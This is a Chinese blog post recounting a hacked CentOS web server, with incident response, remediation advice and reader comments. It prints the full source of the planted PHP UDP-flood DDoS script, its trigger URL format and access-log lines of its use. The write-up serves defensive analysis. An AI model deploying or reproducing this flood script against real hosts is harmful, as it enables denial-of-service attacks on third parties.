您的位置 » 首页 » 安全运营 » Centos服务器被挂马的一次抓马经历

Centos服务器被挂马的一次抓马经历

发表于5年前 | 作者: seay | 分类: 安全运营 | 孵化于:2012年08月12日 | 文章热度:10,752 次 全屏阅读

显示不全请点击全屏阅读

今天早上五点,收到监控宝的警告短信,说是网站M无法访问了。睡的正香,再说网站所在系统是centos,重要数据每天都备份,应该很安全,也没有在意。倒头接着睡觉去了。
早上九点,机房负责人直接给我打来电话,说是全机房网络巨慢,单位的所有网站都打不开或打开的很慢。Centos服务器被挂马的一次抓马经历
我赶紧赶了过去,查看了一下那里网络,发现175服务总是以50M/S速度向外发包,而175服务器正是网站M所在的服务器。
果断SSH连接175服务器,发现175服务器连接也很慢,连上之后top一下,查看cpu负载:
top
 
发现有两个apache进程占用cpu一直在40%以上,马上停止httpd 服务
service httpd stop
 
停止httpd服务之后,再看网络状态,175服务器也不向外发包了,一切正常。
由此判断应该是175服务器挂了马,疯狂向外发包,挤占了全部机房带宽。
下一步就是抓马了!
175服务器是有硬件防火墙,只开http80跟ssh22端口,ssh不太可能被盗号,应该是通过web漏洞挂马。早上5点才中招的,木马程序文件应该在1天之内。
切到M站点根目录之下,查找最近一天内变动的文件,执行
find ./ -mtime -1
 
果然,一个名为phzLtoxn.php的可疑文件出现在目录列表中。查看一下木马程序的创建者,执行
ls -l  phzLtoxn.php
这里发现文件就没了,难道这文件还会自我销毁?Centos服务器被挂马的一次抓马经历
原来发生了一个小插曲,隔壁的管理员小黄也注意到这个文件,二话不说就删除了。我过去劈头批评教育了小黄一顿。见了木马程序就知道删删删删!难道木马程序不会再生成啊?你得顺藤摸瓜,不是一刀切。你得找到漏洞源头!删了没办法,再把httpd服务开启了,引狼入室,等等看能否再生成。
果然,半小时不到,新的phzLtoxn.php文件又生成了。查看了一下,文件创建者是apache,由此判断这肯定是通过网站漏洞上传的。
分析一下木马文件,看下黑客意图
这里贴出phzLtoxn.php文件源代码,并作了简单注释,仅作学习之用。
<?php
//设置脚本运行时间
set_time_limit(999999);
//攻击目标服务器ip
$host = $_GET[‘host’];
//攻击目标服务器端口
$port = $_GET[‘port’];
//攻击时长
$exec_time = $_GET[‘time’];
//每次发送字节数
$Sendlen = 65535;
$packets = 0;
//设置客户机断开不终止脚本的执行
ignore_user_abort(TRUE);
//step1. 目标服务器$host、端口$port、运行时长$exec_time有效性
if (StrLen($host) == 0 or StrLen($port) == 0 or StrLen($exec_time) == 0) {
    if (StrLen($_GET[‘rat’]) <> 0) {
        echo $_GET[‘rat’] . $_SERVER[“HTTP_HOST”] . “|” . GetHostByName($_SERVER[‘SERVER_NAME’]) . “|” . php_uname() . “|” . $_SERVER[‘SERVER_SOFTWARE’] . $_GET[‘rat’];
        exit;
    }
    echo “Warning to: opening”;
    exit;
}
//step2. 设定发字符串$out,这里是“AAAAAAAAAA…”
for ($i = 0; $i < $Sendlen; $i++) {
    $out .= “A”;

$max_time = time() + $exec_time;
//step3. 进行攻击,使用udp向目标服务器狠狠发串串
while (1) {
    $packets++;
    if (time() > $max_time) {
        break;
    }
    $fp = fsockopen(“udp://$host”, $port, $errno, $errstr, 5);
    if ($fp) {
        fwrite($fp, $out);
        fclose($fp);
    }
}
//step4. 攻击统计
echo “Send Host $host:$port<br><br>”;
echo “Send Flow $packets * ($Sendlen/1024=” . round($Sendlen / 1024, 2) . “)kb / 1024 = ” . round($packets * $Sendlen / 1024 / 1024, 2) . ” mb<br><br>”;
echo “Send Rate ” . round($packets / $exec_time, 2) . ” packs/s” . round($packets / $exec_time * $Sendlen / 1024 / 1024, 2) . ” mb/s”;
?> 
 
从以上代码可以看出,是个典型的ddos攻击代码。黑客应该是把我们服务器当傀儡使用,组织大量傀儡服务器疯狂向目标服务器发包。黑客只需要打开浏览器,敲入http://www.2cto.com/phzLtoxn.php?host=x.x.x.x&port=xx&time=xx就可以对目标服务器进行ddos攻击了。
查看httpd日志,分析下攻击ip源,执行
[plain] view plaincopy
tail /var/log/httpd/access.log | grep phzLtonxn.php
183.12.75.240 – – [10/Aug/2012:10:38:46 +0800] “GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1” 404 290 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)”
110.185.121.167 – – [10/Aug/2012:10:38:56 +0800] “GET /phzLtoxn.php?host=218.93.248.98&port=80&time=60 HTTP/1.1” 404 290 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)”
110.185.121.167 – – [10/Aug/2012:10:38:58 +0800] “GET /phzLtoxn.php?host=198.148.89.34&port=80&time=60 HTTP/1.1” 404 290 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)”
110.185.121.167 – – [10/Aug/2012:10:39:08 +0800] “GET /phzLtoxn.php?host=199.119.207.133&port=80&time=60 HTTP/1.1” 404 290 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)”
110.185.121.167 – – [10/Aug/2012:10:39:12 +0800] “GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1” 404 290 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)”
118.161.219.152 – – [10/Aug/2012:10:39:27 +0800] “GET /phzLtoxn.php?host=198.148.89.34&port=80&time=60 HTTP/1.1” 404 290 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)”
118.161.219.152 – – [10/Aug/2012:10:39:27 +0800] “GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1” 404 290 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)”
118.161.219.152 – – [10/Aug/2012:10:39:27 +0800] “GET /phzLtoxn.php?host=199.119.207.133&port=80&time=60 HTTP/1.1” 404 290 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)”
118.161.219.152 – – [10/Aug/2012:10:39:27 +0800] “GET /phzLtoxn.php?host=218.93.248.98&port=80&time=60 HTTP/1.1” 404 290 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)”
118.161.219.152 – – [10/Aug/2012:10:39:28 +0800] “GET /phzLtoxn.php?host=61.164.148.49&port=80&time=60 HTTP/1.1” 404 290 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)”
 
发现源ip来自多个,目标服务器ip也有多个,都属于很多国家,有点奇怪啊,为什么黑客没有针对性的攻击呢,无聊的黑客啊。
 
下一步,找漏洞!
1、重新审视了M站目录下文件权限。仅对几个必要的缓存、静态化的目录为apache开启了写权限,防止phzLtoxn.php文件再次生成。
2、重新开启httpd服务,使用360网站检测对H站进行漏洞检测,发现M站中有严重的远程执行漏洞,于是赶紧打了补丁。
3、补丁打好之后,顺便修改了系统用户、数据库用户、ftp用户的密码、M站系统用户密码。
 
观察几日之后,一切正常。
 
小结一下几个安全原则
1、权限最小化。
web目录一定做好权限,仅仅对apache开几个必要文件夹的写权限。
2、时刻注意补丁更新。
经常使用第三方的网站安全检测工具,也可参考十大安全评估工具,如果网站系统使用了第三方常用程序,多注意一下乌云漏洞平台的信息
3、中招后一定要补牢。
别光删删删删,要查找中招源头,分析黑客目的。
* 作者:叶文涛 (专注php开发、linux运维、系统架构)

Tags:

Linux服务器, 清除木马,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/621/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

已经有7个筒子的人留下了脚印...

  • 独自等待 说:
    1楼
    2012 年 8 月 25 日 上午 4:46 回复

    不错的分析!!!

  • flowind 说:
    2楼
    2013 年 3 月 30 日 下午 11:20 回复

    防止权限扩大..禁止执行函数..以及一些问题函数.
    建立个用户..彻底删除网站目录的写权限
    需要上传文件,稍微添加xxx目录写权限就好..
    好了..在删除xxx目录的脚本执行就好…

    只要限制在一定的范围内..就算出问题也不会有太大的问题……
    维护简单..后期免得麻烦..只要web程序没的问题..其他的就好说..

    • 【管理员】seay 说:
      2013 年 3 月 30 日 下午 11:32 回复

      还有一些其他第三方程序也要注意,比如弱口令什么的,或者溢出

  • flowind 说:
    3楼
    2013 年 4 月 1 日 上午 3:01 回复

    linux还装第三方程序???本来linux提权就异常方便了..还增加难度???
    弄个ssh..一个ftp…一个web就很多了..还要装啥子???其他的全部该端口.屏蔽端口..
    linux这点就是就好可以直接编辑源代码..
    这样就可以直接改端口指纹..这样扫描器也费了..至于弱口令之类的..呵呵弄个8位以上的密码复杂密码就非常难得弄的出来了..在说了改了指纹以后…鬼才晓得你这个端口到底开了啥子服务哦…

    • 【管理员】seay 说:
      2013 年 4 月 1 日 上午 8:23 回复

      。。。

    • skyline 说:
      2013 年 6 月 6 日 上午 11:04 回复

      😯 ➡ 改指纹。。哥们你时间可真多

  • Jone 说:
    4楼
    2013 年 6 月 15 日 下午 4:16 回复

    ➡ apache 我日。。他不是那个 好像是roots的

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)